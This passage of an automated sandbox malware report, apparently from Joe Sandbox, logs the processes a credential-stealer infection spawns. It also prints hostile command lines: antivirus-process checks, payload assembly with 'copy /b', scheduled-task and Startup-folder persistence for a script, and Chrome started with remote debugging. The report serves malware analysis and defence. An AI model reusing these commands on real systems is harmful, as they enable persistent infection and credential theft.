Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:23:27
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"
Imagebase:	0xe10000
File size:	5'952'512 bytes
MD5 hash:	5009B1EF6619ECA039925510D4FD51A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2179626539.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2178551936.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:23:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x7a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:23:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x8e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:23:31
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x7a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:23:31
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x8e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	01:23:31
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 197036
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:23:31
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Imagebase:	0x8e0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	01:23:32
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	01:23:32
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
Wow64 process (32bit):	true
Commandline:	Jurisdiction.pif T
Imagebase:	0x280000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	01:23:32
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xeb0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	01:23:32
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"
Imagebase:	0x590000
File size:	526'848 bytes
MD5 hash:	26D8D52BAC8F4615861F39E118EFA28D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:23:33
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	01:23:33
Start date:	01/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	01:23:33
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	01:23:34
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x7ff6fee10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	01:23:34
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	01:23:34
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	01:23:36
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Imagebase:	0x7ff7c9320000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	01:23:39
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Imagebase:	0x5e0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	01:23:41
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"
Imagebase:	0xa70000
File size:	3'024'384 bytes
MD5 hash:	6250E716BE9BB3618C85DA75BB8A8351
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2809427690.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2592238207.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2853152911.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2461039118.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2821521459.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2592546512.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2345680824.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2345845833.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2708208621.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2783203653.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2743575261.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2461647337.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2637900652.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2592686398.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002A.00000003.2512885460.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	01:23:42
Start date:	01/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	01:23:44
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Imagebase:	0x7ff7c9320000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	01:23:44
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"
Imagebase:	0x130000
File size:	660'480 bytes
MD5 hash:	BDF3C509A0751D1697BA1B1B294FD579
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	01:23:44
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	01:23:45
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Imagebase:	0x5e0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	01:23:48
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"
Imagebase:	0x380000
File size:	334'848 bytes
MD5 hash:	FBA8F56206955304B2A6207D9F5E8032
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 75%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	01:23:53
Start date:	01/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	01:23:53
Start date:	01/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 04E10370 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77e4ca19f308b8fae2b582c78d6ea96626f70ee0e2879ce90c25f511d9b368b
Instruction ID: 0536a7af0339c3b2f3829b9695bf10ae3a3972b03626d250a6b89428fa1247cd
Opcode Fuzzy Hash: e77e4ca19f308b8fae2b582c78d6ea96626f70ee0e2879ce90c25f511d9b368b
Instruction Fuzzy Hash: 0AF019FB2CC110BEB00185853A549FA676EE2C2730370D82AF403C5D22F2D46E8A7131

Function 04E1037E Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6be85814a5726eff318bd69ad841cbc103a08b1859e241e125cc96d7300ee604
Instruction ID: d5bfd87cf95b217391732255383d444d99cdbbaa4b7214a51558e30830de0c2b
Opcode Fuzzy Hash: 6be85814a5726eff318bd69ad841cbc103a08b1859e241e125cc96d7300ee604
Instruction Fuzzy Hash: DA014FB73CC121BEA101D5856A849FA77AEF7D2630370946AF403C6D23F295A9897131

Function 04E103A6 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69d36b5f6b226c18ae86a503c270fe358e8e60dfdd98b3eee2b514e9155d9d5
Instruction ID: 0c52716111bd1ac2bfc99088e13061f404a602e25aa4269dd3db82557681dda8
Opcode Fuzzy Hash: c69d36b5f6b226c18ae86a503c270fe358e8e60dfdd98b3eee2b514e9155d9d5
Instruction Fuzzy Hash: 24F062BA2CC110FEA1018A8966945FA776EF792270770946AF442C6922F2D0698A7230

Function 04E103C3 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d07bda2a66ece35313eebb150993af79bae62713da46bef2475d9e0403d6d00
Instruction ID: 03ae38243b32eb2edb74f2152b8b1f78d16ef3b3f9266fe727b9bf37e7b1ee4d
Opcode Fuzzy Hash: 1d07bda2a66ece35313eebb150993af79bae62713da46bef2475d9e0403d6d00
Instruction Fuzzy Hash: 4EF096B63CC111FEE109CB44A5809FA77B9F7D2720770946AF043CBD23F264AD85A620

Function 04E10413 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13275f29ae7b32ef8b2d90f2f559b5e01e9b55daadd3dfb43ce5d1abbeff573d
Instruction ID: 9b70b11bd3bbdb038f7b9b32995ada7efffe00b41387ea23318c5326c8734c9f
Opcode Fuzzy Hash: 13275f29ae7b32ef8b2d90f2f559b5e01e9b55daadd3dfb43ce5d1abbeff573d
Instruction Fuzzy Hash: 46F05CBB3CC144FDD00249906D846F23F2597965313702BA2E092C98D3E14124CFA131

Function 04E10447 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2224a48864ebc5f0f69d8f787906cf5b31580b60a2b4d9dc909fac5c72552a03
Instruction ID: 616ab55339e4c6677fe34b68770c14ea87abbcb6d9668da8b916ea3aff49e4ea
Opcode Fuzzy Hash: 2224a48864ebc5f0f69d8f787906cf5b31580b60a2b4d9dc909fac5c72552a03
Instruction Fuzzy Hash: 6DF0A0BB2CC460ADA140C94125C46F9375AE7D1620370A85BE0079AA33F158ACCAB171

Function 04E103DF Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551941b06f5ca16b613f9164defc562e4fa82d91cca001f3286992232456c2a5
Instruction ID: 6320de080a7aa9d8047e9a647114edbd4f1f3faf1d35a9011e098234824a73ec
Opcode Fuzzy Hash: 551941b06f5ca16b613f9164defc562e4fa82d91cca001f3286992232456c2a5
Instruction Fuzzy Hash: A4E02BFB3CC010EFF100864039942FA736AA7A0660770E866F443C7A63F2E469CAB031

Function 04E1047D Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfc635fb8be55883e3fb7ed89fb3afd0caf94f3540c0aca5699830752db49b06
Instruction ID: 5fefa90e31cf572cc9c36718a9f971906719d6e648d7f174bf8c7a268889976d
Opcode Fuzzy Hash: bfc635fb8be55883e3fb7ed89fb3afd0caf94f3540c0aca5699830752db49b06
Instruction Fuzzy Hash: 33E09BA35DC5E05EC6834D6090D12F53F929B5752031968C6C0958E937F01D28CBD5E2

Function 04E103FC Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94699a81c1180835f7c4d95df52b2a858b1d6439616fa3da3a63d530d1fac7d
Instruction ID: 968e52938142e048af9ec448690106c171c93a7c99a98ad4e1ec1d11298f7081
Opcode Fuzzy Hash: f94699a81c1180835f7c4d95df52b2a858b1d6439616fa3da3a63d530d1fac7d
Instruction Fuzzy Hash: AFE086BB2CC011BDA040958126845F5366EA3E1570370A857F003C9933F19499897071

Function 04E1042A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c8ceac82fd935bfc6db1fa3e0990ff4c2027337d1db99aff626e4b21a8fe82
Instruction ID: 42900d9c4ce453c1809473115d7d12695cdb37a30a8bb0efb9ee600f287f721e
Opcode Fuzzy Hash: 07c8ceac82fd935bfc6db1fa3e0990ff4c2027337d1db99aff626e4b21a8fe82
Instruction Fuzzy Hash: C7D02EB628C001CEE290E9A130882B43721E790220B2458A7D083CA863D206508AB262

Non-executed Functions

Function 04E10B42 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1383648629.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e10000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3699a904e52d61c0ddf61b89d70eb9c8452454d4d702be9a60e8fbd68a045cac
Instruction ID: a2c9d9b0d696584e1aa1a893360d7f26df000a79bd2551e9bc3358ec98fb8615
Opcode Fuzzy Hash: 3699a904e52d61c0ddf61b89d70eb9c8452454d4d702be9a60e8fbd68a045cac
Instruction Fuzzy Hash: 7DD0A73728C884CE7108D9457768EFA735AF3D7336330407BD006C5432D6A12AC9C960

Analysis Process: axplong.exePID: 8068, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	360
Total number of Limit Nodes:	27

Executed Functions

Function 00C5E440 Relevance: 14.8, Strings: 11, Instructions: 1000
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 00C60534
fed3aa, xrefs: 00C5FA9E
111, xrefs: 00C5F6B0
MJB+, xrefs: 00C5E734
UD==, xrefs: 00C5EA1F, 00C5EC66
246122658369, xrefs: 00C5F647, 00C5F924, 00C604F7, 00C608AA
MT==, xrefs: 00C5E4A5
WWt=, xrefs: 00C6088D
WWp=, xrefs: 00C604DA
GqKudSO2, xrefs: 00C5E47F
WGt=, xrefs: 00C5F62D, 00C5F90A

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
